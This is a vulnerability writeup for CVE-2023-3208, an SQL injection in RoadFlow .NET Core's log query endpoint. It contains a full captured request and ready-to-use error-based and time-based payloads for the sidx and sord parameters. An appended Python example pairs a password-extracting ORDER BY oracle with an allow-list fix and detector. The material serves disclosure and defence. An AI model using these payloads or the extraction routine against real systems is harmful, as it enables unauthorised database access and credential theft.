CVE-2023-3208: vulhub/RoadFlow.md at master · yangxixx/vulhub
A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
1. Log in with the default account.
2. Open the log query page and capture the request with Burp Suite.
3. The captured request:

```http
POST /RoadFlowCore/Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 116
Origin: http://127.0.0.1:5000
Connection: close
Referer: http://127.0.0.1:5000/RoadFlowCore/Log/Index?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&rf_appopenmodel=0&tabid=tab_0B73635494734D66B9C015CAC149EB05
Cookie: rf_login_uniqueid=C9965CEC-493C-4433-8F81-84267ECAF9BD; rf_core_rootdir=; usermenutype=1; rf_core_theme=blue; roadflowcorepagesize=15; RoadFlowCore.Session=CfDJ8EvfmoetFvtFn34qbL0bhQi732bT78siA0k9IyuNV7izzD2HaiCszYysIMm3IHL9tKRQYFo3z2VcOb%2Ba7grHTmnatCG6w2h3Ve0ZUYoFBB%2Fnug6MXcNvN6CJrON40GKlvi5uELoiS8mWsxVTkmR1Bpe%2Fn2KtT%2FGnfrgDuJSlMd8T; .AspNetCore.Antiforgery.SqRQVSlQWbo=CfDJ8EvfmoetFvtFn34qbL0bhQiNLjtoCHp8DTQQSTvj4Wzi3rHnvueNRx4iL7I9mxKb1WgacCXdIFkCxyXh520nuIsS3_NqXifucqHDrhneFPLFspDzv8GeNY-F9Sr7xbTcCfiEOUKwVDAgHp8tTx5DRJI
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

appid=0B736354-9473-4D66-B9C0-15CAC149EB05&_search=false&nd=1686014077522&rows=20000&page=1&sidx=WriteTime&sord=desc
```

4. The `sidx` parameter is vulnerable to error-based injection. Replace its value with `extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29` (URL-decoded: `extractvalue(1,concat(char(126),md5(1205948442)))`); the MD5 hash is returned inside the database error message, which confirms the injection.
5. The `sord` parameter is vulnerable to time-based injection. Replace its value with `desc%2C%28select%2Afrom%28select%2Bsleep%2810%29union%2F%2A%2A%2Fselect%2B1%29a%29` (URL-decoded: `desc,(select*from(select+sleep(10)union/**/select+1)a)`); the response is delayed by 10 seconds.
6. Either injection point can then be handed to sqlmap for automated exploitation.
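The two injection points above, as an added example that is not code from RoadFlow or from the original writeup. `sidx` and `sord` are the jqGrid sort column and sort direction, so the likely bug is that both are concatenated into an `ORDER BY` clause, a position that cannot take a bind parameter; the example shows that vulnerable query builder, an allow-list fix, and a check that flags the PoC request bodies. It runs offline on SQLite, so the MySQL-only `extractvalue()` and `sleep()` from the PoC are replaced by a `CASE` expression that flips the sort order on a condition (the same inference through `ORDER BY`, in portable form). The table and column names, the sample rows and the allow-list contents are assumptions for illustration; the RoadFlow schema is not known.

```python
"""Added example (not from RoadFlow or the writeup): why a sort column/direction
pasted into ORDER BY is injectable, and the allow-list fix. SQLite stands in for
MySQL; extractvalue()/sleep() from the PoC are replaced by a CASE expression that
flips the sort order on a condition, the same ORDER BY inference in portable form."""
import sqlite3
from urllib.parse import parse_qs, unquote

# Captured body and the two URL-encoded payloads from the writeup.
POC_BODY = ("appid=0B736354-9473-4D66-B9C0-15CAC149EB05&_search=false"
            "&nd=1686014077522&rows=20000&page=1&sidx=WriteTime&sord=desc")
SIDX_ENCODED = "extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29"
SORD_ENCODED = ("desc%2C%28select%2Afrom%28select%2Bsleep%2810%29"
                "union%2F%2A%2A%2Fselect%2B1%29a%29")

# Assumed for illustration; the real RoadFlow log schema is unknown.
ALLOWED_SIDX = {"WriteTime", "Title"}
ALLOWED_SORD = {"asc", "desc"}


def decoded_payloads():
    """The two payloads as the server sees them after URL decoding."""
    return unquote(SIDX_ENCODED), unquote(SORD_ENCODED)


def build_query_vulnerable(sidx, sord):
    """The bug class: jqGrid sort parameters interpolated straight into SQL."""
    return f"SELECT Id, Title FROM Log ORDER BY {sidx} {sord}"


def build_query_safe(sidx, sord):
    """ORDER BY cannot take a bind parameter, so allow-list both values
    (or map them to fixed SQL fragments) instead of concatenating them."""
    if sidx not in ALLOWED_SIDX or sord.lower() not in ALLOWED_SORD:
        raise ValueError(f"rejected sort parameters sidx={sidx!r} sord={sord!r}")
    return f'SELECT Id, Title FROM Log ORDER BY "{sidx}" {sord.upper()}'


def sort_params(body):
    """Pull sidx/sord out of a form-encoded body, URL-decoded as the server would."""
    q = parse_qs(body, keep_blank_values=True)
    return q.get("sidx", [""])[0], q.get("sord", [""])[0]


def request_is_safe(body):
    """True if the body's sort parameters pass the allow-list; use as a log check."""
    try:
        build_query_safe(*sort_params(body))
        return True
    except ValueError:
        return False


def inject(body, param, encoded_value):
    """Replace one parameter's value in the captured body, as done in Burp."""
    return "&".join(f"{param}={encoded_value}" if kv.startswith(param + "=") else kv
                    for kv in body.split("&"))


def sample_db():
    """Constructed in-memory data standing in for the application's tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Log (Id INTEGER, Title TEXT, WriteTime TEXT);
        INSERT INTO Log VALUES (1, 'first', '2023-06-01'), (2, 'second', '2023-06-02');
        CREATE TABLE Users (Name TEXT, Pwd TEXT);
        INSERT INTO Users VALUES ('admin', 's3cret');
    """)
    return db


def first_id(db, sidx, sord, builder=build_query_vulnerable):
    """Id of the first row returned for the given sort parameters."""
    return db.execute(builder(sidx, sord)).fetchone()[0]


def guess_is_right(db, position, guess):
    """Boolean inference through sidx: sort by Id when the guess matches, by -Id
    otherwise, so the leading row reveals the condition. The PoC's extractvalue()
    (error text) and sleep() (timing) payloads leak the same bit on MySQL."""
    sidx = (f"(CASE WHEN (SELECT substr(Pwd, {position}, 1) FROM Users) = '{guess}' "
            "THEN Id ELSE -Id END)")
    return first_id(db, sidx, "asc") == 1


def extract_password(db, length=6, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover the stored password one character at a time via the sort oracle."""
    out = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if guess_is_right(db, pos, ch):
                out += ch
                break
    return out


if __name__ == "__main__":
    print("sidx payload:", decoded_payloads()[0])
    print("sord payload:", decoded_payloads()[1])
    db = sample_db()
    print("leaked via ORDER BY:", extract_password(db))
    for body in (POC_BODY, inject(POC_BODY, "sidx", SIDX_ENCODED),
                 inject(POC_BODY, "sord", SORD_ENCODED)):
        print("passes allow-list:", request_is_safe(body), "|", sort_params(body))
```

The allow-list is the fix because `ORDER BY` identifiers and directions are not data and cannot be bound; `request_is_safe()` is the same check turned into a detector that can be run over captured request bodies.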